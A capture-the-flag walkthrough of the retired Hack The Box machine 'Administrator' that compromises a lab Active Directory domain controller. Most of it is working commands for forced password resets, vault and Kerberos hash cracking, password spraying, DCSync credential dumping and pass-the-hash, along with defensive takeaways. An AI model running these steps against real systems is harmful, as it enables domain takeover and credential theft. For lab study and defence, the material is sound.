⚠️ Spoiler warning: This covers a retired HTB machine. This writeup documents my playthrough of the retired Hack The Box machine Administrator.
The VPN IPs shown below are the HTB-assigned VPN addresses used during the box (left intact here for reproducibility). Do not attempt this on non-authorised or active systems.
Administrator (HTB) — Walkthrough
Overview
- Platform: Hack The Box (retired)
- Target OS: Windows Server 2022 — Active Directory Domain Controller
- Focus: AD enumeration → BloodHound ACL abuse (ForceChangePassword chain) → FTP loot → Password Safe cracking → DCSync → SYSTEM
- Difficulty: Medium
Recon
Initial scan:
nmap -sV -sC -oN scans/administrator-initial 10.129.x.x
Result highlights (relevant lines)
53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open ncacn_http 636/tcp open ldapssl 3268/tcp open ldap Global Catalog 3269/tcp open ldapssl Global Catalog 5985/tcp open http Microsoft HTTPAPI (WinRM)
The full Kerberos + LDAP + Global-Catalog set confirms this host is a Domain Controller. The TLS certificate on 636/3269 disclosed the domain (administrator.htb) and the DC hostname.

Initial credentials & domain enumeration
The box description provides a starting credential:
olivia : ichliebedich
Validate against SMB:
nxc smb 10.129.x.x -u olivia -p 'ichliebedich'
[+] administrator.htb\olivia:ichliebedich confirms the creds and that olivia is a valid domain user.

Pull the domain user list over LDAP for later targeting:
nxc ldap 10.129.x.x -u olivia -p 'ichliebedich' --users
Notable accounts: olivia, michael, benjamin, emily, ethan, alexander, emma, Administrator, plus the usual built-ins.
BloodHound collection & ACL chain
Collect with bloodhound-python directly against the DC:
bloodhound-python -d administrator.htb -u olivia -p 'ichliebedich' \
-ns 10.129.x.x -c All --zip
Import the zip into BloodHound CE and mark olivia as Owned. Running Shortest Paths from Owned Principals surfaces a clean ACL chain:
OLIVIA --[GenericAll / ForceChangePassword]--> MICHAEL
MICHAEL --[ForceChangePassword]--> BENJAMIN
The chain is the intended foothold ladder — abuse ForceChangePassword twice to land as Benjamin, who has access we don’t.

ForceChangePassword: Olivia → Michael
ForceChangePassword lets the principal reset the target’s password without knowing the current one. From Linux this is straightforward over SAMR:
net rpc password 'michael' 'NewP@ssw0rd!1' -U 'administrator.htb/olivia%ichliebedich' -S 10.129.x.x
Validate the new credential immediately:
nxc smb 10.129.x.x -u michael -p 'NewP@ssw0rd!1'


If you prefer running this from a Windows beachhead with PowerView:
$pw = ConvertTo-SecureString 'NewP@ssw0rd!1' -AsPlainText -Force
Set-DomainUserPassword -Identity michael -AccountPassword $pw
ForceChangePassword: Michael → Benjamin
Repeat the exact same primitive one hop down the chain — this time as Michael against Benjamin:
net rpc password 'benjamin' 'NewP@ssw0rd!2' -U 'administrator.htb/michael%NewP@ssw0rd!1' -S 10.129.x.x
nxc smb 10.129.x.x -u benjamin -p 'NewP@ssw0rd!2'

FTP foothold as Benjamin
Benjamin is permitted on the FTP service (port 21) — that’s the reason the chain ends here:
ftp 10.129.x.x
# Name: benjamin
# Password: NewP@ssw0rd!2
ftp> ls
ftp> binary
ftp> get Backup.psafe3
ftp> bye
A single artifact drops out — Backup.psafe3, a Password Safe v3 encrypted vault.
Cracking the Password Safe vault
Hashcat speaks Password Safe v3 natively as mode 5200, so there’s no need for the pwsafe2john detour — point it straight at the vault file:
hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

rockyou cracks it almost immediately — the master passphrase is tekieromucho.

Open the vault with the cracked passphrase:
pwsafe Backup.psafe3
Three entries inside — Alexander Smith, Emily Rodriguez, Emma Johnson:

The vault gives three plaintext domain passwords (one per entry):

Password spraying the vault contents
The vault hands you three passwords but not which login each one belongs to — Password Safe stores them by display name, and the actual samAccountName mapping isn’t guaranteed. Instead of guessing, drop the three accounts into users.txt and the three passwords into pass.txt and let nxc spray them as a matrix:
nxc smb 10.129.x.x -u users.txt -p pass.txt
Only one combination authenticates — emily : UXLCI5iETUsIBoFVTj8yQFKoHjXmb:

Drop straight into a WinRM shell with the matched cred:
evil-winrm -i 10.129.x.x -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

The user flag lives under C:\Users\Emily\Desktop\user.txt.
Privilege escalation: Emily → Ethan
Re-running BloodHound with Emily marked as Owned exposes the next edge:
EMILY --[GenericWrite]--> ETHAN
Ethan is the interesting target because he holds DCSync rights (GetChanges + GetChangesAll on the domain object). GenericWrite on a user lets us assign an arbitrary servicePrincipalName — which immediately makes Ethan Kerberoastable. That’s the whole idea behind targeted Kerberoasting: the tool writes a throwaway SPN onto the target, requests a TGS, then cleans up.
Fix the clock first
Kerberos refuses tickets with skew greater than 5 minutes. The nmap output flagged a ~7h offset against the DC, so sync the local clock before doing anything Kerberos-related:
sudo ntpdate 10.129.x.x

targetedKerberoast
python3 targetedKerberoast.py -d administrator.htb -u emily \
-p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
The script writes an SPN onto Ethan, prints the resulting $krb5tgs$23$... hash, and removes the SPN — Ethan looks unchanged afterwards.

Cracking Ethan’s TGS
Save the hash to ethan.txt and crack it as Kerberos 5 TGS-REP (-m 13100):
hashcat -a 0 -m 13100 ethan.txt /usr/share/wordlists/rockyou.txt

Plaintext: limpbizkit.
DCSync as Ethan
Ethan’s ACL gives him GetChanges + GetChangesAll on the domain object — game over. Pull the Administrator secret directly off the DC:
impacket-secretsdump administrator.htb/ethan:'limpbizkit'@10.129.x.x
The first RemoteOperations call falls back from the service-control path (access_denied) to the DRSUAPI replication method, which is the actual DCSync — and out comes the Administrator NTLM:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ec553c4b9fd20bd016e098d2d2fd2e:::

SYSTEM via pass-the-hash
Re-use evil-winrm with the NTLM hash to land directly as Administrator:
evil-winrm -i 10.129.x.x -u Administrator -H 3ec553c4b9fd20bd016e098d2d2fd2e
root.txt lives at C:\Users\Administrator\Desktop\root.txt.
Takeaways
- BloodHound is the map. The
Olivia → Michael → Benjaminchain is invisible from rawnet useroutput — only an ACL graph surfaces it. ForceChangePasswordis a sleeper privilege. It looks innocuous in raw ACL output but is a complete account takeover primitive. Audit who can reset whom in your own AD.- Backups leak credentials. A Password Safe file on FTP is the canonical example — backup pipelines need the same scrutiny as production secrets stores.
GenericWriteon a user = Kerberoasting. You don’t need an existing SPN; you can write one yourself, roast, then clean up.targetedKerberoastautomates the whole dance.- Watch the clock. A 7-hour offset against the DC silently breaks every Kerberos request —
ntpdatebefore you roast. - DCSync is the AD endgame. Any principal with
GetChanges+GetChangesAllon the domain object can replicatekrbtgtandAdministrator— treat those rights as Tier-0. - Chain, don’t tunnel. Each hop here was small (one ACL edge, one cracked file, one writable attribute). The compromise emerges from chaining them, which is exactly how real AD breaches look.
Resources
- BloodHound CE — SpecterOps
- Impacket —
secretsdump.py,psexec.py - targetedKerberoast — abuse
GenericWriteto make a user roastable - hashcat — modes
5200(Password Safe v3) and13100(Kerberos 5 TGS-REP) - Password Safe
- MITRE ATT&CK T1003.006 — DCSync
- Hack The Box — retired machines archive
